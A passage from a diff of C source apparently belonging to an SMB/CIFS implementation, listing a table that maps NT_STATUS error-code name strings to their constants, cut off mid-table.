+-	{"NT_STATUS_LOCK_NOT_GRANTED", NT_STATUS_LOCK_NOT_GRANTED},
+-	{"NT_STATUS_DELETE_PENDING", NT_STATUS_DELETE_PENDING},
+-	{"NT_STATUS_CTL_FILE_NOT_SUPPORTED",
+-	 NT_STATUS_CTL_FILE_NOT_SUPPORTED},
+-	{"NT_STATUS_UNKNOWN_REVISION", NT_STATUS_UNKNOWN_REVISION},
+-	{"NT_STATUS_REVISION_MISMATCH", NT_STATUS_REVISION_MISMATCH},
+-	{"NT_STATUS_INVALID_OWNER", NT_STATUS_INVALID_OWNER},
+-	{"NT_STATUS_INVALID_PRIMARY_GROUP",
+-	 NT_STATUS_INVALID_PRIMARY_GROUP},
+-	{"NT_STATUS_NO_IMPERSONATION_TOKEN",
+-	 NT_STATUS_NO_IMPERSONATION_TOKEN},
+-	{"NT_STATUS_CANT_DISABLE_MANDATORY",
+-	 NT_STATUS_CANT_DISABLE_MANDATORY},
+-	{"NT_STATUS_NO_LOGON_SERVERS", NT_STATUS_NO_LOGON_SERVERS},
+-	{"NT_STATUS_NO_SUCH_LOGON_SESSION",
+-	 NT_STATUS_NO_SUCH_LOGON_SESSION},
+-	{"NT_STATUS_NO_SUCH_PRIVILEGE", NT_STATUS_NO_SUCH_PRIVILEGE},
+-	{"NT_STATUS_PRIVILEGE_NOT_HELD", NT_STATUS_PRIVILEGE_NOT_HELD},
+-	{"NT_STATUS_INVALID_ACCOUNT_NAME", NT_STATUS_INVALID_ACCOUNT_NAME},
+-	{"NT_STATUS_USER_EXISTS", NT_STATUS_USER_EXISTS},
+-	{"NT_STATUS_NO_SUCH_USER", NT_STATUS_NO_SUCH_USER},
+-	{"NT_STATUS_GROUP_EXISTS", NT_STATUS_GROUP_EXISTS},
+-	{"NT_STATUS_NO_SUCH_GROUP", NT_STATUS_NO_SUCH_GROUP},
+-	{"NT_STATUS_MEMBER_IN_GROUP", NT_STATUS_MEMBER_IN_GROUP},
+-	{"NT_STATUS_MEMBER_NOT_IN_GROUP", NT_STATUS_MEMBER_NOT_IN_GROUP},
+-	{"NT_STATUS_LAST_ADMIN", NT_STATUS_LAST_ADMIN},
+-	{"NT_STATUS_WRONG_PASSWORD", NT_STATUS_WRONG_PASSWORD},
+-	{"NT_STATUS_ILL_FORMED_PASSWORD", NT_STATUS_ILL_FORMED_PASSWORD},
+-	{"NT_STATUS_PASSWORD_RESTRICTION", NT_STATUS_PASSWORD_RESTRICTION},
+-	{"NT_STATUS_LOGON_FAILURE", NT_STATUS_LOGON_FAILURE},
+-	{"NT_STATUS_ACCOUNT_RESTRICTION", NT_STATUS_ACCOUNT_RESTRICTION},
+-	{"NT_STATUS_INVALID_LOGON_HOURS", NT_STATUS_INVALID_LOGON_HOURS},
+-	{"NT_STATUS_INVALID_WORKSTATION", NT_STATUS_INVALID_WORKSTATION},
+-	{"NT_STATUS_PASSWORD_EXPIRED", NT_STATUS_PASSWORD_EXPIRED},
+-	{"NT_STATUS_ACCOUNT_DISABLED", NT_STATUS_ACCOUNT_DISABLED},
+-	{"NT_STATUS_NONE_MAPPED", NT_STATUS_NONE_MAPPED},
+-	{"NT_STATUS_TOO_MANY_LUIDS_REQUESTED",
+-	 NT_STATUS_TOO_MANY_LUIDS_REQUESTED},
+-	{"NT_STATUS_LUIDS_EXHAUSTED", NT_STATUS_LUIDS_EXHAUSTED},
+-	{"NT_STATUS_INVALID_SUB_AUTHORITY",
+-	 NT_STATUS_INVALID_SUB_AUTHORITY},
+-	{"NT_STATUS_INVALID_ACL", NT_STATUS_INVALID_ACL},
+-	{"NT_STATUS_INVALID_SID", NT_STATUS_INVALID_SID},
+-	{"NT_STATUS_INVALID_SECURITY_DESCR",
+-	 NT_STATUS_INVALID_SECURITY_DESCR},
+-	{"NT_STATUS_PROCEDURE_NOT_FOUND", NT_STATUS_PROCEDURE_NOT_FOUND},
+-	{"NT_STATUS_INVALID_IMAGE_FORMAT", NT_STATUS_INVALID_IMAGE_FORMAT},
+-	{"NT_STATUS_NO_TOKEN", NT_STATUS_NO_TOKEN},
+-	{"NT_STATUS_BAD_INHERITANCE_ACL", NT_STATUS_BAD_INHERITANCE_ACL},
+-	{"NT_STATUS_RANGE_NOT_LOCKED", NT_STATUS_RANGE_NOT_LOCKED},
+-	{"NT_STATUS_DISK_FULL", NT_STATUS_DISK_FULL},
+-	{"NT_STATUS_SERVER_DISABLED", NT_STATUS_SERVER_DISABLED},
+-	{"NT_STATUS_SERVER_NOT_DISABLED", NT_STATUS_SERVER_NOT_DISABLED},
+-	{"NT_STATUS_TOO_MANY_GUIDS_REQUESTED",
+-	 NT_STATUS_TOO_MANY_GUIDS_REQUESTED},
+-	{"NT_STATUS_GUIDS_EXHAUSTED", NT_STATUS_GUIDS_EXHAUSTED},
+-	{"NT_STATUS_INVALID_ID_AUTHORITY", NT_STATUS_INVALID_ID_AUTHORITY},
+-	{"NT_STATUS_AGENTS_EXHAUSTED", NT_STATUS_AGENTS_EXHAUSTED},
+-	{"NT_STATUS_INVALID_VOLUME_LABEL", NT_STATUS_INVALID_VOLUME_LABEL},
+-	{"NT_STATUS_SECTION_NOT_EXTENDED", NT_STATUS_SECTION_NOT_EXTENDED},
+-	{"NT_STATUS_NOT_MAPPED_DATA", NT_STATUS_NOT_MAPPED_DATA},
+-	{"NT_STATUS_RESOURCE_DATA_NOT_FOUND",
+-	 NT_STATUS_RESOURCE_DATA_NOT_FOUND},
+-	{"NT_STATUS_RESOURCE_TYPE_NOT_FOUND",
+-	 NT_STATUS_RESOURCE_TYPE_NOT_FOUND},
+-	{"NT_STATUS_RESOURCE_NAME_NOT_FOUND",
+-	 NT_STATUS_RESOURCE_NAME_NOT_FOUND},
+-	{"NT_STATUS_ARRAY_BOUNDS_EXCEEDED",
+-	 NT_STATUS_ARRAY_BOUNDS_EXCEEDED},
+-	{"NT_STATUS_FLOAT_DENORMAL_OPERAND",
+-	 NT_STATUS_FLOAT_DENORMAL_OPERAND},
+-	{"NT_STATUS_FLOAT_DIVIDE_BY_ZERO", NT_STATUS_FLOAT_DIVIDE_BY_ZERO},
+-	{"NT_STATUS_FLOAT_INEXACT_RESULT", NT_STATUS_FLOAT_INEXACT_RESULT},
+-	{"NT_STATUS_FLOAT_INVALID_OPERATION",
+-	 NT_STATUS_FLOAT_INVALID_OPERATION},
+-	{"NT_STATUS_FLOAT_OVERFLOW", NT_STATUS_FLOAT_OVERFLOW},
+-	{"NT_STATUS_FLOAT_STACK_CHECK", NT_STATUS_FLOAT_STACK_CHECK},
+-	{"NT_STATUS_FLOAT_UNDERFLOW", NT_STATUS_FLOAT_UNDERFLOW},
+-	{"NT_STATUS_INTEGER_DIVIDE_BY_ZERO",
+-	 NT_STATUS_INTEGER_DIVIDE_BY_ZERO},
+-	{"NT_STATUS_INTEGER_OVERFLOW", NT_STATUS_INTEGER_OVERFLOW},
+-	{"NT_STATUS_PRIVILEGED_INSTRUCTION",
+-	 NT_STATUS_PRIVILEGED_INSTRUCTION},
+-	{"NT_STATUS_TOO_MANY_PAGING_FILES",
+-	 NT_STATUS_TOO_MANY_PAGING_FILES},
+-	{"NT_STATUS_FILE_INVALID", NT_STATUS_FILE_INVALID},
+-	{"NT_STATUS_ALLOTTED_SPACE_EXCEEDED",
+-	 NT_STATUS_ALLOTTED_SPACE_EXCEEDED},
+-	{"NT_STATUS_INSUFFICIENT_RESOURCES",
+-	 NT_STATUS_INSUFFICIENT_RESOURCES},
+-	{"NT_STATUS_DFS_EXIT_PATH_FOUND", NT_STATUS_DFS_EXIT_PATH_FOUND},
+-	{"NT_STATUS_DEVICE_DATA_ERROR", NT_STATUS_DEVICE_DATA_ERROR},
+-	{"NT_STATUS_DEVICE_NOT_CONNECTED", NT_STATUS_DEVICE_NOT_CONNECTED},
+-	{"NT_STATUS_DEVICE_POWER_FAILURE", NT_STATUS_DEVICE_POWER_FAILURE},
+-	{"NT_STATUS_FREE_VM_NOT_AT_BASE", NT_STATUS_FREE_VM_NOT_AT_BASE},
+-	{"NT_STATUS_MEMORY_NOT_ALLOCATED", NT_STATUS_MEMORY_NOT_ALLOCATED},
+-	{"NT_STATUS_WORKING_SET_QUOTA", NT_STATUS_WORKING_SET_QUOTA},
+-	{"NT_STATUS_MEDIA_WRITE_PROTECTED",
+-	 NT_STATUS_MEDIA_WRITE_PROTECTED},
+-	{"NT_STATUS_DEVICE_NOT_READY", NT_STATUS_DEVICE_NOT_READY},
+-	{"NT_STATUS_INVALID_GROUP_ATTRIBUTES",
+-	 NT_STATUS_INVALID_GROUP_ATTRIBUTES},
+-	{"NT_STATUS_BAD_IMPERSONATION_LEVEL",
+-	 NT_STATUS_BAD_IMPERSONATION_LEVEL},
+-	{"NT_STATUS_CANT_OPEN_ANONYMOUS", NT_STATUS_CANT_OPEN_ANONYMOUS},
+-	{"NT_STATUS_BAD_VALIDATION_CLASS", NT_STATUS_BAD_VALIDATION_CLASS},
+-	{"NT_STATUS_BAD_TOKEN_TYPE", NT_STATUS_BAD_TOKEN_TYPE},
+-	{"NT_STATUS_BAD_MASTER_BOOT_RECORD",
+-	 NT_STATUS_BAD_MASTER_BOOT_RECORD},
+-	{"NT_STATUS_INSTRUCTION_MISALIGNMENT",
+-	 NT_STATUS_INSTRUCTION_MISALIGNMENT},
+-	{"NT_STATUS_INSTANCE_NOT_AVAILABLE",
+-	 NT_STATUS_INSTANCE_NOT_AVAILABLE},
+-	{"NT_STATUS_PIPE_NOT_AVAILABLE", NT_STATUS_PIPE_NOT_AVAILABLE},
+-	{"NT_STATUS_INVALID_PIPE_STATE", NT_STATUS_INVALID_PIPE_STATE},
+-	{"NT_STATUS_PIPE_BUSY", NT_STATUS_PIPE_BUSY},
+-	{"NT_STATUS_ILLEGAL_FUNCTION", NT_STATUS_ILLEGAL_FUNCTION},
+-	{"NT_STATUS_PIPE_DISCONNECTED", NT_STATUS_PIPE_DISCONNECTED},
+-	{"NT_STATUS_PIPE_CLOSING", NT_STATUS_PIPE_CLOSING},
+-	{"NT_STATUS_PIPE_CONNECTED", NT_STATUS_PIPE_CONNECTED},
+-	{"NT_STATUS_PIPE_LISTENING", NT_STATUS_PIPE_LISTENING},
+-	{"NT_STATUS_INVALID_READ_MODE", NT_STATUS_INVALID_READ_MODE},
+-	{"NT_STATUS_IO_TIMEOUT", NT_STATUS_IO_TIMEOUT},
+-	{"NT_STATUS_FILE_FORCED_CLOSED", NT_STATUS_FILE_FORCED_CLOSED},
+-	{"NT_STATUS_PROFILING_NOT_STARTED",
+-	 NT_STATUS_PROFILING_NOT_STARTED},
+-	{"NT_STATUS_PROFILING_NOT_STOPPED",
+-	 NT_STATUS_PROFILING_NOT_STOPPED},
+-	{"NT_STATUS_COULD_NOT_INTERPRET", NT_STATUS_COULD_NOT_INTERPRET},
+-	{"NT_STATUS_FILE_IS_A_DIRECTORY", NT_STATUS_FILE_IS_A_DIRECTORY},
+-	{"NT_STATUS_NOT_SUPPORTED", NT_STATUS_NOT_SUPPORTED},
+-	{"NT_STATUS_REMOTE_NOT_LISTENING", NT_STATUS_REMOTE_NOT_LISTENING},
+-	{"NT_STATUS_DUPLICATE_NAME", NT_STATUS_DUPLICATE_NAME},
+-	{"NT_STATUS_BAD_NETWORK_PATH", NT_STATUS_BAD_NETWORK_PATH},
+-	{"NT_STATUS_NETWORK_BUSY", NT_STATUS_NETWORK_BUSY},
+-	{"NT_STATUS_DEVICE_DOES_NOT_EXIST",
+-	 NT_STATUS_DEVICE_DOES_NOT_EXIST},
+-	{"NT_STATUS_TOO_MANY_COMMANDS", NT_STATUS_TOO_MANY_COMMANDS},
+-	{"NT_STATUS_ADAPTER_HARDWARE_ERROR",
+-	 NT_STATUS_ADAPTER_HARDWARE_ERROR},
+-	{"NT_STATUS_INVALID_NETWORK_RESPONSE",
+-	 NT_STATUS_INVALID_NETWORK_RESPONSE},
+-	{"NT_STATUS_UNEXPECTED_NETWORK_ERROR",
+-	 NT_STATUS_UNEXPECTED_NETWORK_ERROR},
+-	{"NT_STATUS_BAD_REMOTE_ADAPTER", NT_STATUS_BAD_REMOTE_ADAPTER},
+-	{"NT_STATUS_PRINT_QUEUE_FULL", NT_STATUS_PRINT_QUEUE_FULL},
+-	{"NT_STATUS_NO_SPOOL_SPACE", NT_STATUS_NO_SPOOL_SPACE},
+-	{"NT_STATUS_PRINT_CANCELLED", NT_STATUS_PRINT_CANCELLED},
+-	{"NT_STATUS_NETWORK_NAME_DELETED", NT_STATUS_NETWORK_NAME_DELETED},
+-	{"NT_STATUS_NETWORK_ACCESS_DENIED",
+-	 NT_STATUS_NETWORK_ACCESS_DENIED},
+-	{"NT_STATUS_BAD_DEVICE_TYPE", NT_STATUS_BAD_DEVICE_TYPE},
+-	{"NT_STATUS_BAD_NETWORK_NAME", NT_STATUS_BAD_NETWORK_NAME},
+-	{"NT_STATUS_TOO_MANY_NAMES", NT_STATUS_TOO_MANY_NAMES},
+-	{"NT_STATUS_TOO_MANY_SESSIONS", NT_STATUS_TOO_MANY_SESSIONS},
+-	{"NT_STATUS_SHARING_PAUSED", NT_STATUS_SHARING_PAUSED},
+-	{"NT_STATUS_REQUEST_NOT_ACCEPTED", NT_STATUS_REQUEST_NOT_ACCEPTED},
+-	{"NT_STATUS_REDIRECTOR_PAUSED", NT_STATUS_REDIRECTOR_PAUSED},
+-	{"NT_STATUS_NET_WRITE_FAULT", NT_STATUS_NET_WRITE_FAULT},
+-	{"NT_STATUS_PROFILING_AT_LIMIT", NT_STATUS_PROFILING_AT_LIMIT},
+-	{"NT_STATUS_NOT_SAME_DEVICE", NT_STATUS_NOT_SAME_DEVICE},
+-	{"NT_STATUS_FILE_RENAMED", NT_STATUS_FILE_RENAMED},
+-	{"NT_STATUS_VIRTUAL_CIRCUIT_CLOSED",
+-	 NT_STATUS_VIRTUAL_CIRCUIT_CLOSED},
+-	{"NT_STATUS_NO_SECURITY_ON_OBJECT",
+-	 NT_STATUS_NO_SECURITY_ON_OBJECT},
+-	{"NT_STATUS_CANT_WAIT", NT_STATUS_CANT_WAIT},
+-	{"NT_STATUS_PIPE_EMPTY", NT_STATUS_PIPE_EMPTY},
+-	{"NT_STATUS_CANT_ACCESS_DOMAIN_INFO",
+-	 NT_STATUS_CANT_ACCESS_DOMAIN_INFO},
+-	{"NT_STATUS_CANT_TERMINATE_SELF", NT_STATUS_CANT_TERMINATE_SELF},
+-	{"NT_STATUS_INVALID_SERVER_STATE", NT_STATUS_INVALID_SERVER_STATE},
+-	{"NT_STATUS_INVALID_DOMAIN_STATE", NT_STATUS_INVALID_DOMAIN_STATE},
+-	{"NT_STATUS_INVALID_DOMAIN_ROLE", NT_STATUS_INVALID_DOMAIN_ROLE},
+-	{"NT_STATUS_NO_SUCH_DOMAIN", NT_STATUS_NO_SUCH_DOMAIN},
+-	{"NT_STATUS_DOMAIN_EXISTS", NT_STATUS_DOMAIN_EXISTS},
+-	{"NT_STATUS_DOMAIN_LIMIT_EXCEEDED",
+-	 NT_STATUS_DOMAIN_LIMIT_EXCEEDED},
+-	{"NT_STATUS_OPLOCK_NOT_GRANTED", NT_STATUS_OPLOCK_NOT_GRANTED},
+-	{"NT_STATUS_INVALID_OPLOCK_PROTOCOL",
+-	 NT_STATUS_INVALID_OPLOCK_PROTOCOL},
+-	{"NT_STATUS_INTERNAL_DB_CORRUPTION",
+-	 NT_STATUS_INTERNAL_DB_CORRUPTION},
+-	{"NT_STATUS_INTERNAL_ERROR", NT_STATUS_INTERNAL_ERROR},
+-	{"NT_STATUS_GENERIC_NOT_MAPPED", NT_STATUS_GENERIC_NOT_MAPPED},
+-	{"NT_STATUS_BAD_DESCRIPTOR_FORMAT",
+-	 NT_STATUS_BAD_DESCRIPTOR_FORMAT},
+-	{"NT_STATUS_INVALID_USER_BUFFER", NT_STATUS_INVALID_USER_BUFFER},
+-	{"NT_STATUS_UNEXPECTED_IO_ERROR", NT_STATUS_UNEXPECTED_IO_ERROR},
+-	{"NT_STATUS_UNEXPECTED_MM_CREATE_ERR",
+-	 NT_STATUS_UNEXPECTED_MM_CREATE_ERR},
+-	{"NT_STATUS_UNEXPECTED_MM_MAP_ERROR",
+-	 NT_STATUS_UNEXPECTED_MM_MAP_ERROR},
+-	{"NT_STATUS_UNEXPECTED_MM_EXTEND_ERR",
+-	 NT_STATUS_UNEXPECTED_MM_EXTEND_ERR},
+-	{"NT_STATUS_NOT_LOGON_PROCESS", NT_STATUS_NOT_LOGON_PROCESS},
+-	{"NT_STATUS_LOGON_SESSION_EXISTS", NT_STATUS_LOGON_SESSION_EXISTS},
+-	{"NT_STATUS_INVALID_PARAMETER_1", NT_STATUS_INVALID_PARAMETER_1},
+-	{"NT_STATUS_INVALID_PARAMETER_2", NT_STATUS_INVALID_PARAMETER_2},
+-	{"NT_STATUS_INVALID_PARAMETER_3", NT_STATUS_INVALID_PARAMETER_3},
+-	{"NT_STATUS_INVALID_PARAMETER_4", NT_STATUS_INVALID_PARAMETER_4},
+-	{"NT_STATUS_INVALID_PARAMETER_5", NT_STATUS_INVALID_PARAMETER_5},
+-	{"NT_STATUS_INVALID_PARAMETER_6", NT_STATUS_INVALID_PARAMETER_6},
+-	{"NT_STATUS_INVALID_PARAMETER_7", NT_STATUS_INVALID_PARAMETER_7},
+-	{"NT_STATUS_INVALID_PARAMETER_8", NT_STATUS_INVALID_PARAMETER_8},
+-	{"NT_STATUS_INVALID_PARAMETER_9", NT_STATUS_INVALID_PARAMETER_9},
+-	{"NT_STATUS_INVALID_PARAMETER_10", NT_STATUS_INVALID_PARAMETER_10},
+-	{"NT_STATUS_INVALID_PARAMETER_11", NT_STATUS_INVALID_PARAMETER_11},
+-	{"NT_STATUS_INVALID_PARAMETER_12", NT_STATUS_INVALID_PARAMETER_12},
+-	{"NT_STATUS_REDIRECTOR_NOT_STARTED",
+-	 NT_STATUS_REDIRECTOR_NOT_STARTED},
+-	{"NT_STATUS_REDIRECTOR_STARTED", NT_STATUS_REDIRECTOR_STARTED},
+-	{"NT_STATUS_STACK_OVERFLOW", NT_STATUS_STACK_OVERFLOW},
+-	{"NT_STATUS_NO_SUCH_PACKAGE", NT_STATUS_NO_SUCH_PACKAGE},
+-	{"NT_STATUS_BAD_FUNCTION_TABLE", NT_STATUS_BAD_FUNCTION_TABLE},
+-	{"NT_STATUS_DIRECTORY_NOT_EMPTY", NT_STATUS_DIRECTORY_NOT_EMPTY},
+-	{"NT_STATUS_FILE_CORRUPT_ERROR", NT_STATUS_FILE_CORRUPT_ERROR},
+-	{"NT_STATUS_NOT_A_DIRECTORY", NT_STATUS_NOT_A_DIRECTORY},
+-	{"NT_STATUS_BAD_LOGON_SESSION_STATE",
+-	 NT_STATUS_BAD_LOGON_SESSION_STATE},
+-	{"NT_STATUS_LOGON_SESSION_COLLISION",
+-	 NT_STATUS_LOGON_SESSION_COLLISION},
+-	{"NT_STATUS_NAME_TOO_LONG", NT_STATUS_NAME_TOO_LONG},
+-	{"NT_STATUS_FILES_OPEN", NT_STATUS_FILES_OPEN},
+-	{"NT_STATUS_CONNECTION_IN_USE", NT_STATUS_CONNECTION_IN_USE},
+-	{"NT_STATUS_MESSAGE_NOT_FOUND", NT_STATUS_MESSAGE_NOT_FOUND},
+-	{"NT_STATUS_PROCESS_IS_TERMINATING",
+-	 NT_STATUS_PROCESS_IS_TERMINATING},
+-	{"NT_STATUS_INVALID_LOGON_TYPE", NT_STATUS_INVALID_LOGON_TYPE},
+-	{"NT_STATUS_NO_GUID_TRANSLATION", NT_STATUS_NO_GUID_TRANSLATION},
+-	{"NT_STATUS_CANNOT_IMPERSONATE", NT_STATUS_CANNOT_IMPERSONATE},
+-	{"NT_STATUS_IMAGE_ALREADY_LOADED", NT_STATUS_IMAGE_ALREADY_LOADED},
+-	{"NT_STATUS_ABIOS_NOT_PRESENT", NT_STATUS_ABIOS_NOT_PRESENT},
+-	{"NT_STATUS_ABIOS_LID_NOT_EXIST", NT_STATUS_ABIOS_LID_NOT_EXIST},
+-	{"NT_STATUS_ABIOS_LID_ALREADY_OWNED",
+-	 NT_STATUS_ABIOS_LID_ALREADY_OWNED},
+-	{"NT_STATUS_ABIOS_NOT_LID_OWNER", NT_STATUS_ABIOS_NOT_LID_OWNER},
+-	{"NT_STATUS_ABIOS_INVALID_COMMAND",
+-	 NT_STATUS_ABIOS_INVALID_COMMAND},
+-	{"NT_STATUS_ABIOS_INVALID_LID", NT_STATUS_ABIOS_INVALID_LID},
+-	{"NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE",
+-	 NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE},
+-	{"NT_STATUS_ABIOS_INVALID_SELECTOR",
+-	 NT_STATUS_ABIOS_INVALID_SELECTOR},
+-	{"NT_STATUS_NO_LDT", NT_STATUS_NO_LDT},
+-	{"NT_STATUS_INVALID_LDT_SIZE", NT_STATUS_INVALID_LDT_SIZE},
+-	{"NT_STATUS_INVALID_LDT_OFFSET", NT_STATUS_INVALID_LDT_OFFSET},
+-	{"NT_STATUS_INVALID_LDT_DESCRIPTOR",
+-	 NT_STATUS_INVALID_LDT_DESCRIPTOR},
+-	{"NT_STATUS_INVALID_IMAGE_NE_FORMAT",
+-	 NT_STATUS_INVALID_IMAGE_NE_FORMAT},
+-	{"NT_STATUS_RXACT_INVALID_STATE", NT_STATUS_RXACT_INVALID_STATE},
+-	{"NT_STATUS_RXACT_COMMIT_FAILURE", NT_STATUS_RXACT_COMMIT_FAILURE},
+-	{"NT_STATUS_MAPPED_FILE_SIZE_ZERO",
+-	 NT_STATUS_MAPPED_FILE_SIZE_ZERO},
+-	{"NT_STATUS_TOO_MANY_OPENED_FILES",
+-	 NT_STATUS_TOO_MANY_OPENED_FILES},
+-	{"NT_STATUS_CANCELLED", NT_STATUS_CANCELLED},
+-	{"NT_STATUS_CANNOT_DELETE", NT_STATUS_CANNOT_DELETE},
+-	{"NT_STATUS_INVALID_COMPUTER_NAME",
+-	 NT_STATUS_INVALID_COMPUTER_NAME},
+-	{"NT_STATUS_FILE_DELETED", NT_STATUS_FILE_DELETED},
+-	{"NT_STATUS_SPECIAL_ACCOUNT", NT_STATUS_SPECIAL_ACCOUNT},
+-	{"NT_STATUS_SPECIAL_GROUP", NT_STATUS_SPECIAL_GROUP},
+-	{"NT_STATUS_SPECIAL_USER", NT_STATUS_SPECIAL_USER},
+-	{"NT_STATUS_MEMBERS_PRIMARY_GROUP",
+-	 NT_STATUS_MEMBERS_PRIMARY_GROUP},
+-	{"NT_STATUS_FILE_CLOSED", NT_STATUS_FILE_CLOSED},
+-	{"NT_STATUS_TOO_MANY_THREADS", NT_STATUS_TOO_MANY_THREADS},
+-	{"NT_STATUS_THREAD_NOT_IN_PROCESS",
+-	 NT_STATUS_THREAD_NOT_IN_PROCESS},
+-	{"NT_STATUS_TOKEN_ALREADY_IN_USE", NT_STATUS_TOKEN_ALREADY_IN_USE},
+-	{"NT_STATUS_PAGEFILE_QUOTA_EXCEEDED",
+-	 NT_STATUS_PAGEFILE_QUOTA_EXCEEDED},
+-	{"NT_STATUS_COMMITMENT_LIMIT", NT_STATUS_COMMITMENT_LIMIT},
+-	{"NT_STATUS_INVALID_IMAGE_LE_FORMAT",
+-	 NT_STATUS_INVALID_IMAGE_LE_FORMAT},
+-	{"NT_STATUS_INVALID_IMAGE_NOT_MZ", NT_STATUS_INVALID_IMAGE_NOT_MZ},
+-	{"NT_STATUS_INVALID_IMAGE_PROTECT",
+-	 NT_STATUS_INVALID_IMAGE_PROTECT},
+-	{"NT_STATUS_INVALID_IMAGE_WIN_16", NT_STATUS_INVALID_IMAGE_WIN_16},
+-	{"NT_STATUS_LOGON_SERVER_CONFLICT",
+-	 NT_STATUS_LOGON_SERVER_CONFLICT},
+-	{"NT_STATUS_TIME_DIFFERENCE_AT_DC",
+-	 NT_STATUS_TIME_DIFFERENCE_AT_DC},
+-	{"NT_STATUS_SYNCHRONIZATION_REQUIRED",
+-	 NT_STATUS_SYNCHRONIZATION_REQUIRED},
+-	{"NT_STATUS_DLL_NOT_FOUND", NT_STATUS_DLL_NOT_FOUND},
+-	{"NT_STATUS_OPEN_FAILED", NT_STATUS_OPEN_FAILED},
+-	{"NT_STATUS_IO_PRIVILEGE_FAILED", NT_STATUS_IO_PRIVILEGE_FAILED},
+-	{"NT_STATUS_ORDINAL_NOT_FOUND", NT_STATUS_ORDINAL_NOT_FOUND},
+-	{"NT_STATUS_ENTRYPOINT_NOT_FOUND", NT_STATUS_ENTRYPOINT_NOT_FOUND},
+-	{"NT_STATUS_CONTROL_C_EXIT", NT_STATUS_CONTROL_C_EXIT},
+-	{"NT_STATUS_LOCAL_DISCONNECT", NT_STATUS_LOCAL_DISCONNECT},
+-	{"NT_STATUS_REMOTE_DISCONNECT", NT_STATUS_REMOTE_DISCONNECT},
+-	{"NT_STATUS_REMOTE_RESOURCES", NT_STATUS_REMOTE_RESOURCES},
+-	{"NT_STATUS_LINK_FAILED", NT_STATUS_LINK_FAILED},
+-	{"NT_STATUS_LINK_TIMEOUT", NT_STATUS_LINK_TIMEOUT},
+-	{"NT_STATUS_INVALID_CONNECTION", NT_STATUS_INVALID_CONNECTION},
+-	{"NT_STATUS_INVALID_ADDRESS", NT_STATUS_INVALID_ADDRESS},
+-	{"NT_STATUS_DLL_INIT_FAILED", NT_STATUS_DLL_INIT_FAILED},
+-	{"NT_STATUS_MISSING_SYSTEMFILE", NT_STATUS_MISSING_SYSTEMFILE},
+-	{"NT_STATUS_UNHANDLED_EXCEPTION", NT_STATUS_UNHANDLED_EXCEPTION},
+-	{"NT_STATUS_APP_INIT_FAILURE", NT_STATUS_APP_INIT_FAILURE},
+-	{"NT_STATUS_PAGEFILE_CREATE_FAILED",
+-	 NT_STATUS_PAGEFILE_CREATE_FAILED},
+-	{"NT_STATUS_NO_PAGEFILE", NT_STATUS_NO_PAGEFILE},
+-	{"NT_STATUS_INVALID_LEVEL", NT_STATUS_INVALID_LEVEL},
+-	{"NT_STATUS_WRONG_PASSWORD_CORE", NT_STATUS_WRONG_PASSWORD_CORE},
+-	{"NT_STATUS_ILLEGAL_FLOAT_CONTEXT",
+-	 NT_STATUS_ILLEGAL_FLOAT_CONTEXT},
+-	{"NT_STATUS_PIPE_BROKEN", NT_STATUS_PIPE_BROKEN},
+-	{"NT_STATUS_REGISTRY_CORRUPT", NT_STATUS_REGISTRY_CORRUPT},
+-	{"NT_STATUS_REGISTRY_IO_FAILED", NT_STATUS_REGISTRY_IO_FAILED},
+-	{"NT_STATUS_NO_EVENT_PAIR", NT_STATUS_NO_EVENT_PAIR},
+-	{"NT_STATUS_UNRECOGNIZED_VOLUME", NT_STATUS_UNRECOGNIZED_VOLUME},
+-	{"NT_STATUS_SERIAL_NO_DEVICE_INITED",
+-	 NT_STATUS_SERIAL_NO_DEVICE_INITED},
+-	{"NT_STATUS_NO_SUCH_ALIAS", NT_STATUS_NO_SUCH_ALIAS},
+-	{"NT_STATUS_MEMBER_NOT_IN_ALIAS", NT_STATUS_MEMBER_NOT_IN_ALIAS},
+-	{"NT_STATUS_MEMBER_IN_ALIAS", NT_STATUS_MEMBER_IN_ALIAS},
+-	{"NT_STATUS_ALIAS_EXISTS", NT_STATUS_ALIAS_EXISTS},
+-	{"NT_STATUS_LOGON_NOT_GRANTED", NT_STATUS_LOGON_NOT_GRANTED},
+-	{"NT_STATUS_TOO_MANY_SECRETS", NT_STATUS_TOO_MANY_SECRETS},
+-	{"NT_STATUS_SECRET_TOO_LONG", NT_STATUS_SECRET_TOO_LONG},
+-	{"NT_STATUS_INTERNAL_DB_ERROR", NT_STATUS_INTERNAL_DB_ERROR},
+-	{"NT_STATUS_FULLSCREEN_MODE", NT_STATUS_FULLSCREEN_MODE},
+-	{"NT_STATUS_TOO_MANY_CONTEXT_IDS", NT_STATUS_TOO_MANY_CONTEXT_IDS},
+-	{"NT_STATUS_LOGON_TYPE_NOT_GRANTED",
+-	 NT_STATUS_LOGON_TYPE_NOT_GRANTED},
+-	{"NT_STATUS_NOT_REGISTRY_FILE", NT_STATUS_NOT_REGISTRY_FILE},
+-	{"NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED",
+-	 NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED},
+-	{"NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR",
+-	 NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR},
+-	{"NT_STATUS_FT_MISSING_MEMBER", NT_STATUS_FT_MISSING_MEMBER},
+-	{"NT_STATUS_ILL_FORMED_SERVICE_ENTRY",
+-	 NT_STATUS_ILL_FORMED_SERVICE_ENTRY},
+-	{"NT_STATUS_ILLEGAL_CHARACTER", NT_STATUS_ILLEGAL_CHARACTER},
+-	{"NT_STATUS_UNMAPPABLE_CHARACTER", NT_STATUS_UNMAPPABLE_CHARACTER},
+-	{"NT_STATUS_UNDEFINED_CHARACTER", NT_STATUS_UNDEFINED_CHARACTER},
+-	{"NT_STATUS_FLOPPY_VOLUME", NT_STATUS_FLOPPY_VOLUME},
+-	{"NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND",
+-	 NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND},
+-	{"NT_STATUS_FLOPPY_WRONG_CYLINDER",
+-	 NT_STATUS_FLOPPY_WRONG_CYLINDER},
+-	{"NT_STATUS_FLOPPY_UNKNOWN_ERROR", NT_STATUS_FLOPPY_UNKNOWN_ERROR},
+-	{"NT_STATUS_FLOPPY_BAD_REGISTERS", NT_STATUS_FLOPPY_BAD_REGISTERS},
+-	{"NT_STATUS_DISK_RECALIBRATE_FAILED",
+-	 NT_STATUS_DISK_RECALIBRATE_FAILED},
+-	{"NT_STATUS_DISK_OPERATION_FAILED",
